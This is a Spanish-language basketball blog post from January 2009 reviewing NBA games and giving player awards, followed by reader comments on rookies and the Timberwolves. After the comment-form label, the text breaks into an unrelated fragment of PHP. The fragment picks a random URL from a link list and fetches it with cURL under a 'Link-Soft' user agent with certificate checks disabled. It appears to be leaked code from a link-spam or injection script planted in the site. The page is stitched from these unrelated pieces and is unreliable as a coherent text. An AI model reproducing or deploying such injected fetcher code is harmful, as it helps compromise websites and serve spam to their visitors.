La crónica (23/1/2009)

24 de January de 2009 por Jabho

By Viva&Jabhito

Ayer situábamos el duelo entre Mavericks y Pistons, ex-aspirantes al título, como partido de la jornada. Partido que parecía igualado a priori viendo sus balances o sus flojas rachas últimamente. No fue así, y los Mavericks se llevaron con mucha autoridad el partido. Y es que en Dallas recuperaron a Howard, Kidd hizo un buen partido e incluso Bass marcó su mejor actuación de la temporada. Porque Dirk sigue jugando a gran nivel y Terry lidera con solvencia la 2ª unidad, así que a poco que se unan otros a la fiesta los Mavs creceran.  Detroit por contra huele muy mal. Vienen jugando mal y lo mejor para ellos es que el verano ya no está lejos. Atrás quedó ese equipo que mordía en defensa (ayer al descanso Dallas tiraba con un 66% de acierto) y atacaba al ritmo de Smooth… Tienen crédito para llegar a Play Offs pero esperamos muchos cambios para el año que viene.

Otro punto de atención era el debut este año de Monta Ellis. En su día se sucedieron rumores sobre su condición física, sobre si le rescincidrían el contrato, su actitud… milongas. Anoche volvió y fue titular, jugó un buen partido y dejó jugadas de plena potencia, dejando claro que físicamente está recuperado. Partidazo además el que jugaron Warriors y Cavaliers, con unos últimos minutos para enmarcar lleno de alternativas y emoción. Los Warriors han recuperado reciéntemente a Magette y a Jackson, ayer a Ellis, Biedrins sigue haciendo el trabajo oscuro bajo los aros y con los Crawford más las sorpresas que de cada noche tipo Morrows o Bellinelis tienen equipo al menos para asustar. Ayer pusieron contra las cuerdas a Cleveland que necesitó mucho de LeBron ante las ausencias de Big Z y West. Jackson puso por delante a Golden a falta de 6 segundos pero un buzzer beater de LeBron y clin, clin, caja. La Lucha por le este se presenta igualadísima.

Unos que van para arriba, contra nuestro pronóstico, son los Bobcats. Y ayer se enfrentaron a unos que van para abajo, los Suns. Cualquiera diría que Diaw le tenía ganas a su ex-equipo. Victoria de Charlotte y no sabría decir cual de los dos está mas cerca de Play Offs…

Y más de equipos que deben mejorar en esta 2ª parte de la temporada. Ayer los Pacers ganaron a los Rockets donde Yao dió un susto al tener que retirarse lesionado en la rodilla. Parece que no es nada. Pero los Pacers , con Dunleavy recuperado, son mejores que las 16 victorias que llevan así que subirán. Los Rockets bueno, se defienden a pesar de las lesiones de T-Mac y Artest. Si sirven para que esten sanos mas adelante bienvenidas sean.

Y otro que nos gustaría ver recuperarse es Toronto que de la mano de Jose es otro equipo. Volvió trás perderse 10 de los últimos 11 partidos y dejar a su equipo al borde del abismo. Hasta el entrenador reconoce que con él en cancha la cosa pinta distinta. Ayer ganaron a los Bulls que encadenan 4 derrotas seguidas.

Sorpresa de los Wolves que vencieron a un teórico, más teórico que real ahora mismo, candidato como los Hornets. Sin West ni Chandler sólo Paul y Posey opusieron resistencia. Minnesota oye, parece que McHale le ha cogido el punto, 8 victorias y 2 derrotas en los últimos 10 partidos.

En otros partidos los Spurs vencieron a los Nets a pesar del empeño de Harris&Carter, pero también se empeñó Duncan y ya se sabe. Los Knicks encadenaron su 3ª victoria seguida contra Memphis que lo de entrenador nuevo no le ha valido. Más motivos tuvieron para echar a Iavaronni en la época de Pau en el equipo, porque ahora era el momento de tener paciencia… Mucho más de lo que han hecho no esperarían, supongo. Los Hawks ganaron cómodamente a los Bucks y se asientan como cuartos en el este. Por último duelo de colistas entre Thunders y Clippers que se llevaron estos últimos. Con la enfermeria repleta el rookie Gordon y el sophmore Thorton abrieron el frasco de las esencias… buena pinta la de ambos. Durant por su parte hizo lo que pudo, que fue mucho, pero no sufiente ya que estuvo muy sólo.

PREMIOS

MVP: Como cada viernes hay muchos y variados candidatos. Granger, Nowitzki y Josh Smith lideraron a sus equipos, Calderón volvío con un 23-10, sin fallar un tiro libre y con un 90% en tiros de campo. Gerald Wallace fue la pesadilla de los Suns con 28 puntos, 8 rebotes, 5 asistencias y 5 robos. Eric Gordon perdió el duelo individual con Durant pero ganó el partido con sus 41 puntos. Al Jefferson y Randy Foye tumbaron a los Hornets sumando entre ambos 48 puntos, 19 rebotes y 9 asistencias. Tim ‘duracell’ Duncan se encargó de los Nets con 30-15-5 y 4 tapones. Y el de casi siempre se lleva el premio, Lebron James tuvo que echarse el equipo a la espalda cuando se complicó el partido, acabó con 32 puntos, 9 rebotes, 8 asistencias, 3 robos y 2 tapones.

Rookie: Mala noche en general para los novatos, se salvan los 19 puntos de Anthony Morrow, Brook Lopez 15 puntos y 8 rebotes, pero el que tuvo su dia fue el ya mencionado Eric Gordon con 41 puntos en la victoria de los Clippers.

La sorpresaBoris Diaw les dio sopas a sus ex compañeros, 26-11-4 frente a Shaq&Amare, Mike Conley fue el mejor de Memphis con un 18-6-4, hacia tiempo que Flip Murray no tenia un buen partido, anoche 25 puntos casi sin fallo. El premio para el de los Bobcats, pero no se nos puede pasar que Ricky Davis dio 11 asistencias, lo nunca visto.

La decepción: Steve Nash hizo anoche 4 puntos, 5 asistencias y 6 pérdidas, en el personificamos los 76 puntos de los SunsOJ Mayo y Derrick Rose no hicieron casi nada para evitar las abultadas derrotas de sus equipos.

El Mayo Esfuerzo en Vano: Charlie Villanueva con 27-7, Chris Paul 23-12, 26-6 de Carter y Jackson con 24-8-8. Todos ellos quedan muy lejos de Kevin Durant, 46 puntos, 15 rebotes, 4 asistencias y 24 de 26 en tiros libres, ninguno de sus compañeros alcanzó los 15 puntos.

Razones para trasnochar

Cavaliers-Jazzs: Lebron y los suyos ponen a prueba el record de 17-4 que los de Sloan tienen en casa, hay bajas por ambos lados pero ninguno puede permitirse descolgarse de los que tienen delante, sin Kirilenko no hay nadie que pueda inquietar a Lebron mientras que Millsap deberá imponerse en la zona. A las 3 de la madrugada hora peninsular.

Jugador a seguir: Andre Iguodala, en su último partido contra los Knicks se acercó al triple doble y el estilo de estos le deja campo libre para desplegar todas sus armas, tienen la obligación de ganar.

Comenta

8 comentarios a esta entrada

  1. Llukas 70 dice:
    #1

    Por el momento estamos ante el mejor Lebon de la historia, aunque aun quedan muchos años.

      Citar

  2. kantonyo dice:
    #2

    Soy un poco pesado con el tema, pero no creeis que cada vez se merecen menos el premio de rookies del año tanto Oj Mayo como Rose???

    Por cierto, interesante la mejora que han demostrado dos cenicientas como Charlotte y Minnesota. Los Wolves lo tienen casi imposible de entrar en playoffs, ya que tendria que hacer un balance de 34-8 para llegar al porcentaje de victorias de Phoenix. En cambio los Bobcats, tienen a tiro los play-offs, y podrían ser el tapado del Este…. despues de una temporada que parecia mediocre y de transicíón.

      Citar

  3. Fran Reyes dice:
    #3

    Creo que una de las claves de la mejora de los Wolves es la entrada en la rotación de Mike Miller y Telfair en lugar de McCants y Kevin Ollie. Son jugadores de mayor nivel, brillantes, tiradores, en sustitución de medianías sin gran talento. Seguramente no llegarán a entrar en play-off, pero se van a constituir en un hueso para el resto de franquicias de la liga.

      Citar

  4. Llukas 70 dice:
    #4

    Estoy deacuerdo en que cada vez mas tanto Derrick Rose como OJ Mayo se merecen menos el premio,
    pero (siempre hay un “pero”) la liga es muy larga y solo porque memphis i chicago esten teniendo un año horrible no se debe decir de estos dos rookies lo mismo. Rose es el hombre que mueve todos los bulls, es el mejor base de su edad . Mientras que Mayo es la segunda unidad anotadora despues de Gay, yo lo considero el mejor anotador de esta gran generacion de rookies.

    Respecto a la pregunta que ha hecho Kantonyo, sí, como ya he dicho han bajado su nivel y cada vez se merecen menos el rookie del año, pero como tambien he dicho la temporada es larga y Rose y Mayo aun no tienen el fisico suficiente como para jugar a una altura notable todos los partidos.

    Cuando estabamos a principios de temporada la gente decia que bueno que es Rose o dios mio que bien que lo hace Mayo!! y ahora la gente dice: Puah tampoco es para tanto!!
    Pero no, la gente se equivoca, porque estos dos jugadores son los mejores de este draft ( ademas de beasley) y que me cuelguen si Rose no sera en el futuro el mejor base de la liga y que OJ superara records de anotacion en memphis y se convertira en un referente de la nba durante la proxima decada.

      Citar

  5. Viva_Dirk dice:
    #5

    Fran, dices que la mejora es por eso, y yo te contesto con unos datos.

    Mes de Noviembre, record de los Wolves en ese mes 3-11: Mike Miller 34.8 minutos, Telfair 20. 8 minutos, McCants 15.6 minutos y Ollie solo jugó 5 partidos con 13.8 minutos de media.

    Mes de Enero, record de los Wolves este mes 7-2: Mike Miller 25.9 minutos, Telfair 35.1 minutos, ni McCants ni Ollie están jugando, el primero por lesión.

    Como ves Miller juega menos minutos y Telfair si esta hacieno un gran papel.

    En mi opinión la mejora de los Wolves viene por Foye y Love en gran medida, Randy en estos 9 partidos ha promediado 20.4 puntos con un 50% de acierto y sin apenas pérdidas mientras que antes de estos partidos estaba en 14.4 con un 40%. Y el rookie ha pasado ha liderar practicamente la 2ª unidad, en esta racha sus números son de 11.4 puntos y 10 rebotes en poco mas de 20 minutos de juego, y antes de esto estaba decepcionando por completo.

      Citar

  6. Txusma dice:
    #6

    Lo que si parece es que la lucha por el rookie del año va a estar más igualada de lo que se esperaba a principio de campaña. Estoy totalmente de acuerdo en que Rose y Mayo son los mejores de este profundísimo draft, pero los Westbrook, Lopez, Love, Beasley, Gasol, Rudy, Gordon, etc… estan haciendo todos un gran papel.

      Citar

  7. Fran Reyes dice:
    #7

    Dirk, te contesto también con otros datos. Mes de Diciembre, récord 2-13: Ollie 19.5 minutos, McCants 25.1 minutos, Telfair 18 minutos (la media sube porque, si mal no recuerdo, en ese tiempo estuvo Foye lesionado), Mike Miller sólo juega 7 de los 15 partidos por lesión.

    Aunque, como tú bien dices, la mejora de Foye es también un punto vital en la mejora de los Wolves, que por cierto juegan a las 1.00 contra Chicago.

      Citar

  8. Txusma dice:
    #8

    Y por cierto, les han ganado con un excepcional Jefferson.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>